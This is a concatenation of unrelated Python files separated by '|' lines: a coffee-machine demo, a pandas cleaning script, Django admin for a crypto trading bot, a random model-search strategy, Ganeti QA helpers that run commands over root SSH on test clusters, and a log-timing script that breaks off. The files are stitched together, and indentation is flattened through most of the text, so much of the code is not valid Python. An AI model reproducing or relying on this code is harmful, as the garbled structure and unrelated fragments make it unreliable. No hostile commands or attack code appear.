for _ in range(20):
time.sleep(0.1)
self.water_level -= 1
print(self.boil_water())
print("Coffee is ready!")
@log
def add_water(self, water_level):
time.sleep(randint(1, 5))
self.water_level += water_level
print("Blub blub blub...")
if __name__ == "__main__":
machine = CoffeeMachine()
    for _ in range(5):
machine.make_coffee()
machine.make_coffee()
machine.add_water(70)
|
import pandas as pd
from common import PathLike
def clean_data(
input_path: PathLike,
output_path: PathLike
):
df = pd.read_csv(input_path)
df = df.dropna()
df.to_csv(output_path)
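# Note: df.dropna() removes every row containing any NaN, and DataFrame.to_csv
# writes the row index as an extra column by default; pass index=False if the
# index should not appear in the cleaned file.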
clean_data(
input_path="data.csv",
output_path="clean_data.csv"
)
|
from django.contrib import admin
from .models import (
OHLCV,
Account,
Bot,
Currency,
Market,
Order,
OrderErrorLog,
Saving,
Trade,
)
class BotInline(admin.TabularInline):
model = Bot
extra = 0
class OrderInline(admin.TabularInline):
model = Order
extra = 0
class TradeInline(admin.TabularInline):
model = Trade
extra = 0
class ErrorInline(admin.TabularInline):
model = OrderErrorLog
extra = 0
class SavingInline(admin.TabularInline):
model = Saving
extra = 0
class AccountAdmin(admin.ModelAdmin):
fieldsets = [
("User", {"fields": ["user"]}),
(
"Exchange information",
{
"fields": [
"exchange",
"api_key",
"secret",
"password",
"default_fee_rate",
]
},
),
]
list_display = ("user", "exchange")
list_filter = ["user", "exchange"]
search_fields = ["user"]
inlines = [BotInline]
class CurrencyAdmin(admin.ModelAdmin):
fields = ["short", "name"]
list_display = ("short", "name")
search_fields = ["short", "name"]
class MarketAdmin(admin.ModelAdmin):
fieldsets = [
("Base", {"fields": ["exchange", "active"]}),
("Currencies", {"fields": ["base", "quote"]}),
(
"Market information",
{
"classes": ("collapse",),
"fields": [
"precision_amount",
"precision_price",
"limits_amount_min",
"limits_amount_max",
"limits_price_min",
"limits_price_max",
],
},
),
]
list_display = ("symbol", "exchange", "active")
list_filter = ["exchange", "active"]
search_fields = ["base", "quote"]
class BotAdmin(admin.ModelAdmin):
readonly_fields = (
"created",
"start_amount",
"current_amount",
"estimate_current_amount",
"roi",
"estimate_roi",
"orders_count",
)
fieldsets = [
("Base", {"fields": ["account", "active"]}),
("Trade Mode: Wave Rider", {"fields": ["market", "timeframe"]}),
(
"Trade Mode: Rising Chart",
{"fields": ["quote", "max_amount", "min_rise", "stop_loss", "lock_time"]},
),
(
"Stats",
{
"fields": [
"start_amount",
"current_amount",
"estimate_current_amount",
"roi",
"estimate_roi",
"orders_count",
]
},
),
]
list_display = (
"account",
"market",
"created",
"timeframe",
"active",
"roi",
"estimate_roi",
"orders_count",
)
list_filter = ["account", "timeframe", "active"]
search_fields = ["account", "market", "created"]
inlines = [OrderInline, SavingInline]
class OrderAdmin(admin.ModelAdmin):
readonly_fields = ("errors",)
fieldsets = [
("Base", {"fields": ["bot", "errors"]}),
(
"Order",
{
"fields": [
"next_order",
"order_id",
"timestamp",
"status",
"order_type",
"side",
"price",
"amount",
"filled",
]
},
),
("Fee", {"fields": ["fee_currency", "fee_cost", "fee_rate"]}),
("Rising Chart", {"fields": ["last_price_tick", "market"]}),
]
list_display = (
"next_order",
"order_id",
"bot",
"timestamp",
"status",
"side",
"price",
"errors",
)
list_filter = ["bot", "timestamp", "status", "side"]
search_fields = [
"bot",
"order_id",
"timestamp",
"status",
"order_type",
"side",
"price",
"amount",
"filled",
]
# inlines = [TradeInline]
inlines = [ErrorInline]
class TradeAdmin(admin.ModelAdmin):
fieldsets = [
(
None,
{
"fields": [
"order",
"trade_id",
"timestamp",
"taker_or_maker",
"amount",
"fee_currency",
"fee_cost",
"fee_rate",
]
},
),
]
list_display = (
"order",
"trade_id",
"timestamp",
"taker_or_maker",
"amount",
"fee_rate",
)
list_filter = ["taker_or_maker", "timestamp"]
search_fields = [
"order",
"trade_id",
"timestamp",
"taker_or_maker",
"amount",
"fee_currency",
"fee_cost",
"fee_rate",
]
class OHLCVAdmin(admin.ModelAdmin):
fieldsets = [
(
None,
{
"fields": [
"market",
"timeframe",
"timestamp",
"open_price",
"highest_price",
"lowest_price",
"closing_price",
"volume",
]
},
),
]
list_display = (
"market",
"timeframe",
"timestamp",
"open_price",
"highest_price",
"lowest_price",
"closing_price",
"volume",
)
list_filter = ["market", "timeframe", "timestamp"]
search_fields = [
"market",
"timeframe",
"timestamp",
"open_price",
"highest_price",
"lowest_price",
"closing_price",
"volume",
]
admin.site.register(Account, AccountAdmin)
admin.site.register(Bot, BotAdmin)
admin.site.register(Currency, CurrencyAdmin)
admin.site.register(Market, MarketAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(Trade, TradeAdmin)
admin.site.register(OHLCV, OHLCVAdmin)
|
import logging
import random
import time
from .. import Sampler, submit_models, query_available_resources
from .strategy import BaseStrategy
_logger = logging.getLogger(__name__)
class RandomSampler(Sampler):
def choice(self, candidates, mutator, model, index):
return random.choice(candidates)
class RandomStrategy(BaseStrategy):
def __init__(self):
self.random_sampler = RandomSampler()
def run(self, base_model, applied_mutators):
        _logger.info('strategy start...')
while True:
avail_resource = query_available_resources()
if avail_resource > 0:
model = base_model
_logger.info('apply mutators...')
_logger.info('mutators: %s', str(applied_mutators))
for mutator in applied_mutators:
mutator.bind_sampler(self.random_sampler)
model = mutator.apply(model)
# run models
submit_models(model)
else:
time.sleep(2)
|
#
#
# Copyright (C) 2007, 2011, 2012, 2013 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Utilities for QA tests.
"""
import copy
import datetime
import operator
import os
import random
import re
import socket
import subprocess
import sys
import tempfile
import yaml
try:
import functools
except ImportError, err:
raise ImportError("Python 2.5 or higher is required: %s" % err)
from ganeti import utils
from ganeti import compat
from ganeti import constants
from ganeti import ht
from ganeti import pathutils
from ganeti import vcluster
import colors
import qa_config
import qa_error
from qa_logging import FormatInfo
_MULTIPLEXERS = {}
#: Unique ID per QA run
_RUN_UUID = utils.NewUUID()
#: Path to the QA query output log file
_QA_OUTPUT = pathutils.GetLogFilename("qa-output")
_RETRIES = 3
(INST_DOWN,
INST_UP) = range(500, 502)
(FIRST_ARG,
RETURN_VALUE) = range(1000, 1002)
def _RaiseWithInfo(msg, error_desc):
"""Raises a QA error with the given content, and adds a message if present.
"""
if msg:
output = "%s: %s" % (msg, error_desc)
else:
output = error_desc
raise qa_error.Error(output)
def AssertIn(item, sequence, msg=None):
"""Raises an error when item is not in sequence.
"""
if item not in sequence:
_RaiseWithInfo(msg, "%r not in %r" % (item, sequence))
def AssertNotIn(item, sequence, msg=None):
"""Raises an error when item is in sequence.
"""
if item in sequence:
_RaiseWithInfo(msg, "%r in %r" % (item, sequence))
def AssertEqual(first, second, msg=None):
"""Raises an error when values aren't equal.
"""
if not first == second:
_RaiseWithInfo(msg, "%r == %r" % (first, second))
def AssertMatch(string, pattern, msg=None):
"""Raises an error when string doesn't match regexp pattern.
"""
if not re.match(pattern, string):
_RaiseWithInfo(msg, "%r doesn't match /%r/" % (string, pattern))
def _GetName(entity, fn):
"""Tries to get name of an entity.
@type entity: string or dict
@param fn: Function retrieving name from entity
"""
if isinstance(entity, basestring):
result = entity
else:
result = fn(entity)
if not ht.TNonEmptyString(result):
raise Exception("Invalid name '%s'" % result)
return result
def _AssertRetCode(rcode, fail, cmdstr, nodename):
"""Check the return value from a command and possibly raise an exception.
"""
if fail and rcode == 0:
raise qa_error.Error("Command '%s' on node %s was expected to fail but"
" didn't" % (cmdstr, nodename))
elif not fail and rcode != 0:
raise qa_error.Error("Command '%s' on node %s failed, exit code %s" %
(cmdstr, nodename, rcode))
def AssertCommand(cmd, fail=False, node=None, log_cmd=True, max_seconds=None):
"""Checks that a remote command succeeds.
@param cmd: either a string (the command to execute) or a list (to
be converted using L{utils.ShellQuoteArgs} into a string)
@type fail: boolean or None
@param fail: if the command is expected to fail instead of succeeding,
or None if we don't care
@param node: if passed, it should be the node on which the command
should be executed, instead of the master node (can be either a
dict or a string)
@param log_cmd: if False, the command won't be logged (simply passed to
StartSSH)
@type max_seconds: double
@param max_seconds: fail if the command takes more than C{max_seconds}
seconds
@return: the return code, stdout and stderr of the command
@raise qa_error.Error: if the command fails when it shouldn't or vice versa
"""
if node is None:
node = qa_config.GetMasterNode()
nodename = _GetName(node, operator.attrgetter("primary"))
if isinstance(cmd, basestring):
cmdstr = cmd
else:
cmdstr = utils.ShellQuoteArgs(cmd)
start = datetime.datetime.now()
popen = StartSSH(nodename, cmdstr, log_cmd=log_cmd)
# Run the command
stdout, stderr = popen.communicate()
rcode = popen.returncode
duration_seconds = TimedeltaToTotalSeconds(datetime.datetime.now() - start)
if fail is not None:
try:
_AssertRetCode(rcode, fail, cmdstr, nodename)
except:
print "Stdout was:\n%s\nStderr was:\n%s\n" % (stdout, stderr)
raise
if max_seconds is not None:
if duration_seconds > max_seconds:
raise qa_error.Error(
"Cmd '%s' took %f seconds, maximum of %f was exceeded" %
(cmdstr, duration_seconds, max_seconds))
return rcode, stdout, stderr
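# Typical uses (illustrative):
#   AssertCommand(["gnt-cluster", "verify"])  # must succeed
#   AssertCommand("exit 1", fail=True)        # must fail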
def AssertRedirectedCommand(cmd, fail=False, node=None, log_cmd=True):
"""Executes a command with redirected output.
The log will go to the qa-output log file in the ganeti log
directory on the node where the command is executed. The fail and
node parameters are passed unchanged to AssertCommand.
@param cmd: the command to be executed, as a list; a string is not
supported
"""
if not isinstance(cmd, list):
raise qa_error.Error("Non-list passed to AssertRedirectedCommand")
ofile = utils.ShellQuote(_QA_OUTPUT)
cmdstr = utils.ShellQuoteArgs(cmd)
AssertCommand("echo ---- $(date) %s ---- >> %s" % (cmdstr, ofile),
fail=False, node=node, log_cmd=False)
return AssertCommand(cmdstr + " >> %s" % ofile,
fail=fail, node=node, log_cmd=log_cmd)
def GetSSHCommand(node, cmd, strict=True, opts=None, tty=False,
use_multiplexer=True):
"""Builds SSH command to be executed.
@type node: string
@param node: node the command should run on
@type cmd: string
@param cmd: command to be executed in the node; if None or empty
string, no command will be executed
@type strict: boolean
@param strict: whether to enable strict host key checking
@type opts: list
@param opts: list of additional options
@type tty: boolean or None
@param tty: if we should use tty; if None, will be auto-detected
@type use_multiplexer: boolean
@param use_multiplexer: if the multiplexer for the node should be used
"""
args = ["ssh", "-oEscapeChar=none", "-oBatchMode=yes", "-lroot"]
if tty is None:
tty = sys.stdout.isatty()
if tty:
args.append("-t")
args.append("-oStrictHostKeyChecking=%s" % ("yes" if strict else "no", ))
args.append("-oClearAllForwardings=yes")
args.append("-oForwardAgent=yes")
if opts:
args.extend(opts)
if node in _MULTIPLEXERS and use_multiplexer:
spath = _MULTIPLEXERS[node][0]
args.append("-oControlPath=%s" % spath)
args.append("-oControlMaster=no")
(vcluster_master, vcluster_basedir) = \
qa_config.GetVclusterSettings()
if vcluster_master:
args.append(vcluster_master)
args.append("%s/%s/cmd" % (vcluster_basedir, node))
if cmd:
# For virtual clusters the whole command must be wrapped using the "cmd"
# script, as that script sets a number of environment variables. If the
# command contains shell meta characters the whole command needs to be
# quoted.
args.append(utils.ShellQuote(cmd))
else:
args.append(node)
if cmd:
args.append(cmd)
return args
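# Illustrative result, assuming no virtual cluster, no open multiplexer for the
# node and a non-tty stdout:
#   GetSSHCommand("node1.example.com", "uptime", strict=False)
#   -> ["ssh", "-oEscapeChar=none", "-oBatchMode=yes", "-lroot",
#       "-oStrictHostKeyChecking=no", "-oClearAllForwardings=yes",
#       "-oForwardAgent=yes", "node1.example.com", "uptime"]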
def StartLocalCommand(cmd, _nolog_opts=False, log_cmd=True, **kwargs):
"""Starts a local command.
"""
if log_cmd:
if _nolog_opts:
pcmd = [i for i in cmd if not i.startswith("-")]
else:
pcmd = cmd
print "%s %s" % (colors.colorize("Command:", colors.CYAN),
utils.ShellQuoteArgs(pcmd))
return subprocess.Popen(cmd, shell=False, **kwargs)
def StartSSH(node, cmd, strict=True, log_cmd=True):
"""Starts SSH.
"""
return StartLocalCommand(GetSSHCommand(node, cmd, strict=strict),
_nolog_opts=True, log_cmd=log_cmd,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def StartMultiplexer(node):
"""Starts a multiplexer command.
@param node: the node for which to open the multiplexer
"""
if node in _MULTIPLEXERS:
return
# Note: yes, we only need mktemp, since we'll remove the file anyway
sname = tempfile.mktemp(prefix="ganeti-qa-multiplexer.")
utils.RemoveFile(sname)
opts = ["-N", "-oControlPath=%s" % sname, "-oControlMaster=yes"]
print "Created socket at %s" % sname
child = StartLocalCommand(GetSSHCommand(node, None, opts=opts))
_MULTIPLEXERS[node] = (sname, child)
def CloseMultiplexers():
"""Closes all current multiplexers and cleans up.
"""
for node in _MULTIPLEXERS.keys():
(sname, child) = _MULTIPLEXERS.pop(node)
utils.KillProcess(child.pid, timeout=10, waitpid=True)
utils.RemoveFile(sname)
def _GetCommandStdout(proc):
"""Extract the stored standard error, print it and return it.
"""
out = proc.stdout.read()
sys.stdout.write(out)
return out
def _NoTimeout(state):
"""False iff the command timed out."""
rcode, out = state
return rcode == 0 or not ('TimeoutError' in out or 'timed out' in out)
def GetCommandOutput(node, cmd, tty=False, use_multiplexer=True, log_cmd=True,
fail=False):
"""Returns the output of a command executed on the given node.
@type node: string
@param node: node the command should run on
@type cmd: string
@param cmd: command to be executed in the node (cannot be empty or None)
@type tty: bool or None
@param tty: if we should use tty; if None, it will be auto-detected
@type use_multiplexer: bool
@param use_multiplexer: if the SSH multiplexer provided by the QA should be
used or not
@type log_cmd: bool
@param log_cmd: if the command should be logged
@type fail: bool
@param fail: whether the command is expected to fail
"""
assert cmd
def CallCommand():
command = GetSSHCommand(node, cmd, tty=tty,
use_multiplexer=use_multiplexer)
p = StartLocalCommand(command, stdout=subprocess.PIPE, log_cmd=log_cmd)
rcode = p.wait()
out = _GetCommandStdout(p)
return rcode, out
# TODO: make retries configurable
rcode, out = utils.CountRetry(_NoTimeout, CallCommand, _RETRIES)
_AssertRetCode(rcode, fail, cmd, node)
return out
def GetObjectInfo(infocmd):
"""Get and parse information about a Ganeti object.
@type infocmd: list of strings
@param infocmd: command to be executed, e.g. ["gnt-cluster", "info"]
@return: the information parsed, appropriately stored in dictionaries,
lists...
"""
master = qa_config.GetMasterNode()
cmdline = utils.ShellQuoteArgs(infocmd)
info_out = GetCommandOutput(master.primary, cmdline)
return yaml.load(info_out)
def UploadFile(node, src):
"""Uploads a file to a node and returns the filename.
Caller needs to remove the returned file on the node when it's not needed
anymore.
"""
# Make sure nobody else has access to it while preserving local permissions
mode = os.stat(src).st_mode & 0700
cmd = ('tmp=$(mktemp --tmpdir gnt.XXXXXX) && '
'chmod %o "${tmp}" && '
'[[ -f "${tmp}" ]] && '
'cat > "${tmp}" && '
'echo "${tmp}"') % mode
f = open(src, "r")
try:
p = subprocess.Popen(GetSSHCommand(node, cmd), shell=False, stdin=f,
stdout=subprocess.PIPE)
AssertEqual(p.wait(), 0)
# Return temporary filename
return _GetCommandStdout(p).strip()
finally:
f.close()
def UploadData(node, data, mode=0600, filename=None):
"""Uploads data to a node and returns the filename.
Caller needs to remove the returned file on the node when it's not needed
anymore.
"""
if filename:
tmp = "tmp=%s" % utils.ShellQuote(filename)
else:
tmp = ('tmp=$(mktemp --tmpdir gnt.XXXXXX) && '
'chmod %o "${tmp}"') % mode
cmd = ("%s && "
"[[ -f \"${tmp}\" ]] && "
"cat > \"${tmp}\" && "
"echo \"${tmp}\"") % tmp
p = subprocess.Popen(GetSSHCommand(node, cmd), shell=False,
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(data)
p.stdin.close()
AssertEqual(p.wait(), 0)
# Return temporary filename
return _GetCommandStdout(p).strip()
def BackupFile(node, path):
"""Creates a backup of a file on the node and returns the filename.
Caller needs to remove the returned file on the node when it's not needed
anymore.
"""
vpath = MakeNodePath(node, path)
cmd = ("tmp=$(mktemp .gnt.XXXXXX --tmpdir=$(dirname %s)) && "
"[[ -f \"$tmp\" ]] && "
"cp %s $tmp && "
"echo $tmp") % (utils.ShellQuote(vpath), utils.ShellQuote(vpath))
# Return temporary filename
result = GetCommandOutput(node, cmd).strip()
print "Backup filename: %s" % result
return result
def ResolveInstanceName(instance):
"""Gets the full name of an instance.
@type instance: string
@param instance: Instance name
"""
info = GetObjectInfo(["gnt-instance", "info", instance])
return info[0]["Instance name"]
def ResolveNodeName(node):
"""Gets the full name of a node.
"""
info = GetObjectInfo(["gnt-node", "info", node.primary])
return info[0]["Node name"]
def GetNodeInstances(node, secondaries=False):
"""Gets a list of instances on a node.
"""
master = qa_config.GetMasterNode()
node_name = ResolveNodeName(node)
# Get list of all instances
cmd = ["gnt-instance", "list", "--separator=:", "--no-headers",
"--output=name,pnode,snodes"]
output = GetCommandOutput(master.primary, utils.ShellQuoteArgs(cmd))
instances = []
for line in output.splitlines():
(name, pnode, snodes) = line.split(":", 2)
if ((not secondaries and pnode == node_name) or
(secondaries and node_name in snodes.split(","))):
instances.append(name)
return instances
def _SelectQueryFields(rnd, fields):
"""Generates a list of fields for query tests.
"""
# Create copy for shuffling
fields = list(fields)
rnd.shuffle(fields)
# Check all fields
yield fields
yield sorted(fields)
# Duplicate fields
yield fields + fields
# Check small groups of fields
while fields:
yield [fields.pop() for _ in range(rnd.randint(2, 10)) if fields]
def _List(listcmd, fields, names):
"""Runs a list command.
"""
master = qa_config.GetMasterNode()
cmd = [listcmd, "list", "--separator=|", "--no-headers",
"--output", ",".join(fields)]
if names:
cmd.extend(names)
return GetCommandOutput(master.primary,
utils.ShellQuoteArgs(cmd)).splitlines()
def GenericQueryTest(cmd, fields, namefield="name", test_unknown=True):
"""Runs a number of tests on query commands.
@param cmd: Command name
@param fields: List of field names
"""
rnd = random.Random(hash(cmd))
fields = list(fields)
rnd.shuffle(fields)
# Test a number of field combinations
for testfields in _SelectQueryFields(rnd, fields):
AssertRedirectedCommand([cmd, "list", "--output", ",".join(testfields)])
if namefield is not None:
namelist_fn = compat.partial(_List, cmd, [namefield])
# When no names were requested, the list must be sorted
names = namelist_fn(None)
AssertEqual(names, utils.NiceSort(names))
# When requesting specific names, the order must be kept
revnames = list(reversed(names))
AssertEqual(namelist_fn(revnames), revnames)
randnames = list(names)
rnd.shuffle(randnames)
AssertEqual(namelist_fn(randnames), randnames)
if test_unknown:
# Listing unknown items must fail
AssertCommand([cmd, "list", "this.name.certainly.does.not.exist"],
fail=True)
# Check exit code for listing unknown field
rcode, _, _ = AssertRedirectedCommand([cmd, "list",
"--output=field/does/not/exist"],
fail=True)
AssertEqual(rcode, constants.EXIT_UNKNOWN_FIELD)
def GenericQueryFieldsTest(cmd, fields):
master = qa_config.GetMasterNode()
# Listing fields
AssertRedirectedCommand([cmd, "list-fields"])
AssertRedirectedCommand([cmd, "list-fields"] + fields)
# Check listed fields (all, must be sorted)
realcmd = [cmd, "list-fields", "--separator=|", "--no-headers"]
output = GetCommandOutput(master.primary,
utils.ShellQuoteArgs(realcmd)).splitlines()
AssertEqual([line.split("|", 1)[0] for line in output],
utils.NiceSort(fields))
# Check exit code for listing unknown field
rcode, _, _ = AssertCommand([cmd, "list-fields", "field/does/not/exist"],
fail=True)
AssertEqual(rcode, constants.EXIT_UNKNOWN_FIELD)
def AddToEtcHosts(hostnames):
"""Adds hostnames to /etc/hosts.
@param hostnames: List of hostnames first used A records, all other CNAMEs
"""
master = qa_config.GetMasterNode()
tmp_hosts = UploadData(master.primary, "", mode=0644)
data = []
for localhost in ("::1", "127.0.0.1"):
data.append("%s %s" % (localhost, " ".join(hostnames)))
try:
AssertCommand("{ cat %s && echo -e '%s'; } > %s && mv %s %s" %
(utils.ShellQuote(pathutils.ETC_HOSTS),
"\\n".join(data),
utils.ShellQuote(tmp_hosts),
utils.ShellQuote(tmp_hosts),
utils.ShellQuote(pathutils.ETC_HOSTS)))
except Exception:
AssertCommand(["rm", "-f", tmp_hosts])
raise
def RemoveFromEtcHosts(hostnames):
"""Remove hostnames from /etc/hosts.
@param hostnames: List of hostnames first used A records, all other CNAMEs
"""
master = qa_config.GetMasterNode()
tmp_hosts = UploadData(master.primary, "", mode=0644)
quoted_tmp_hosts = utils.ShellQuote(tmp_hosts)
sed_data = " ".join(hostnames)
try:
AssertCommand((r"sed -e '/^\(::1\|127\.0\.0\.1\)\s\+%s/d' %s > %s"
r" && mv %s %s") %
(sed_data, utils.ShellQuote(pathutils.ETC_HOSTS),
quoted_tmp_hosts, quoted_tmp_hosts,
utils.ShellQuote(pathutils.ETC_HOSTS)))
except Exception:
AssertCommand(["rm", "-f", tmp_hosts])
raise
def RunInstanceCheck(instance, running):
"""Check if instance is running or not.
"""
instance_name = _GetName(instance, operator.attrgetter("name"))
script = qa_config.GetInstanceCheckScript()
if not script:
return
master_node = qa_config.GetMasterNode()
# Build command to connect to master node
master_ssh = GetSSHCommand(master_node.primary, "--")
if running:
running_shellval = "1"
running_text = ""
else:
running_shellval = ""
running_text = "not "
print FormatInfo("Checking if instance '%s' is %srunning" %
(instance_name, running_text))
args = [script, instance_name]
env = {
"PATH": constants.HOOKS_PATH,
"RUN_UUID": _RUN_UUID,
"MASTER_SSH": utils.ShellQuoteArgs(master_ssh),
"INSTANCE_NAME": instance_name,
"INSTANCE_RUNNING": running_shellval,
}
result = os.spawnve(os.P_WAIT, script, args, env)
if result != 0:
raise qa_error.Error("Instance check failed with result %s" % result)
def _InstanceCheckInner(expected, instarg, args, result):
"""Helper function used by L{InstanceCheck}.
"""
if instarg == FIRST_ARG:
instance = args[0]
elif instarg == RETURN_VALUE:
instance = result
else:
raise Exception("Invalid value '%s' for instance argument" % instarg)
if expected in (INST_DOWN, INST_UP):
RunInstanceCheck(instance, (expected == INST_UP))
elif expected is not None:
raise Exception("Invalid value '%s'" % expected)
def InstanceCheck(before, after, instarg):
"""Decorator to check instance status before and after test.
@param before: L{INST_DOWN} if instance must be stopped before test,
L{INST_UP} if instance must be running before test, L{None} to not check.
@param after: L{INST_DOWN} if instance must be stopped after test,
L{INST_UP} if instance must be running after test, L{None} to not check.
@param instarg: L{FIRST_ARG} to use first argument to test as instance (a
dictionary), L{RETURN_VALUE} to use return value (disallows pre-checks)
"""
def decorator(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
_InstanceCheckInner(before, instarg, args, NotImplemented)
result = fn(*args, **kwargs)
_InstanceCheckInner(after, instarg, args, result)
return result
return wrapper
return decorator
def GetNonexistentGroups(count):
"""Gets group names which shouldn't exist on the cluster.
  @type count: integer
  @param count: Number of groups to get
  @rtype: list of strings
"""
return GetNonexistentEntityNames(count, "groups", "group")
def GetNonexistentEntityNames(count, name_config, name_prefix):
"""Gets entity names which shouldn't exist on the cluster.
  The actual names can refer to arbitrary entities (for example
  groups, networks).
  @type count: integer
  @param count: Number of names to get
  @type name_config: string
  @param name_config: name of the leaf in the config containing
    this entity's configuration, including an 'inexistent-'
    element
  @type name_prefix: string
  @param name_prefix: prefix of the entity's names, used to compose
    the default values; for example for groups, the prefix is
    'group' and the generated names are then group1, group2, ...
  @rtype: list of strings
"""
entities = qa_config.get(name_config, {})
default = [name_prefix + str(i) for i in range(count)]
assert count <= len(default)
name_config_inexistent = "inexistent-" + name_config
candidates = entities.get(name_config_inexistent, default)[:count]
if len(candidates) < count:
raise Exception("At least %s non-existent %s are needed" %
(count, name_config))
return candidates
def MakeNodePath(node, path):
"""Builds an absolute path for a virtual node.
@type node: string or L{qa_config._QaNode}
@param node: Node
@type path: string
@param path: Path without node-specific prefix
"""
(_, basedir) = qa_config.GetVclusterSettings()
if isinstance(node, basestring):
name = node
else:
name = node.primary
if basedir:
assert path.startswith("/")
return "%s%s" % (vcluster.MakeNodeRoot(basedir, name), path)
else:
return path
def _GetParameterOptions(specs):
"""Helper to build policy options."""
values = ["%s=%s" % (par, val)
for (par, val) in specs.items()]
return ",".join(values)
def TestSetISpecs(new_specs=None, diff_specs=None, get_policy_fn=None,
build_cmd_fn=None, fail=False, old_values=None):
"""Change instance specs for an object.
At most one of new_specs or diff_specs can be specified.
@type new_specs: dict
@param new_specs: new complete specs, in the same format returned by
L{ParseIPolicy}.
@type diff_specs: dict
@param diff_specs: partial specs, it can be an incomplete specifications, but
if min/max specs are specified, their number must match the number of the
existing specs
@type get_policy_fn: function
@param get_policy_fn: function that returns the current policy as in
L{ParseIPolicy}
@type build_cmd_fn: function
@param build_cmd_fn: function that return the full command line from the
options alone
@type fail: bool
@param fail: if the change is expected to fail
@type old_values: tuple
@param old_values: (old_policy, old_specs), as returned by
L{ParseIPolicy}
@return: same as L{ParseIPolicy}
"""
assert get_policy_fn is not None
assert build_cmd_fn is not None
assert new_specs is None or diff_specs is None
if old_values:
(old_policy, old_specs) = old_values
else:
(old_policy, old_specs) = get_policy_fn()
if diff_specs:
new_specs = copy.deepcopy(old_specs)
if constants.ISPECS_MINMAX in diff_specs:
AssertEqual(len(new_specs[constants.ISPECS_MINMAX]),
len(diff_specs[constants.ISPECS_MINMAX]))
for (new_minmax, diff_minmax) in zip(new_specs[constants.ISPECS_MINMAX],
diff_specs[constants.ISPECS_MINMAX]):
for (key, parvals) in diff_minmax.items():
for (par, val) in parvals.items():
new_minmax[key][par] = val
for (par, val) in diff_specs.get(constants.ISPECS_STD, {}).items():
new_specs[constants.ISPECS_STD][par] = val
if new_specs:
cmd = []
if (diff_specs is None or constants.ISPECS_MINMAX in diff_specs):
minmax_opt_items = []
for minmax in new_specs[constants.ISPECS_MINMAX]:
minmax_opts = []
for key in ["min", "max"]:
keyopt = _GetParameterOptions(minmax[key])
minmax_opts.append("%s:%s" % (key, keyopt))
minmax_opt_items.append("/".join(minmax_opts))
cmd.extend([
"--ipolicy-bounds-specs",
"//".join(minmax_opt_items)
])
if diff_specs is None:
std_source = new_specs
else:
std_source = diff_specs
std_opt = _GetParameterOptions(std_source.get("std", {}))
if std_opt:
cmd.extend(["--ipolicy-std-specs", std_opt])
AssertCommand(build_cmd_fn(cmd), fail=fail)
# Check the new state
(eff_policy, eff_specs) = get_policy_fn()
AssertEqual(eff_policy, old_policy)
if fail:
AssertEqual(eff_specs, old_specs)
else:
AssertEqual(eff_specs, new_specs)
else:
(eff_policy, eff_specs) = (old_policy, old_specs)
return (eff_policy, eff_specs)
def ParseIPolicy(policy):
"""Parse and split instance an instance policy.
@type policy: dict
@param policy: policy, as returned by L{GetObjectInfo}
@rtype: tuple
@return: (policy, specs), where:
- policy is a dictionary of the policy values, instance specs excluded
- specs is a dictionary containing only the specs, using the internal
format (see L{constants.IPOLICY_DEFAULTS} for an example)
"""
ret_specs = {}
ret_policy = {}
for (key, val) in policy.items():
if key == "bounds specs":
ret_specs[constants.ISPECS_MINMAX] = []
for minmax in val:
ret_minmax = {}
for key in minmax:
keyparts = key.split("/", 1)
assert len(keyparts) > 1
ret_minmax[keyparts[0]] = minmax[key]
ret_specs[constants.ISPECS_MINMAX].append(ret_minmax)
elif key == constants.ISPECS_STD:
ret_specs[key] = val
else:
ret_policy[key] = val
return (ret_policy, ret_specs)
def UsesIPv6Connection(host, port):
"""Returns True if the connection to a given host/port could go through IPv6.
"""
return any(t[0] == socket.AF_INET6 for t in socket.getaddrinfo(host, port))
def TimedeltaToTotalSeconds(td):
"""Returns the total seconds in a C{datetime.timedelta} object.
This performs the same task as the C{datetime.timedelta.total_seconds()}
method which is present in Python 2.7 onwards.
@type td: datetime.timedelta
@param td: timedelta object to convert
  @rtype: float
@return: total seconds in the timedelta object
"""
return ((td.microseconds + (td.seconds + td.days * 24.0 * 3600.0) * 10 ** 6) /
10 ** 6)
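# Worked example: TimedeltaToTotalSeconds(datetime.timedelta(days=1, seconds=2,
# microseconds=500000)) evaluates to
#   (500000 + (2 + 1 * 24.0 * 3600.0) * 10 ** 6) / 10 ** 6 == 86402.5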
|
import sys
from datetime import datetime, timedelta
if len(sys.argv) < 2:
    print(f'usage: {sys.argv[0]} log_file [log_file ...]')
sys.exit()
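# The first and last line of each log file are expected in `date`-style format
# matching '%a %b %d %H:%M:%S %Z %Y', e.g. (illustrative):
#   Mon Aug 03 10:15:00 UTC 2020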
duration = timedelta(0)
for log_file in sys.argv[1:]:
    # Reset per file so each file contributes its own first-to-last span;
    # without this, files after the first reuse the first file's start time.
    last_line = None
    start_datetime = None
    with open(log_file) as f:
        lines = f.readlines()
        for line in lines:
            if last_line is None:
                start_datetime = datetime.strptime(line[:-1], '%a %b %d %H:%M:%S %Z %Y')
            last_line = line
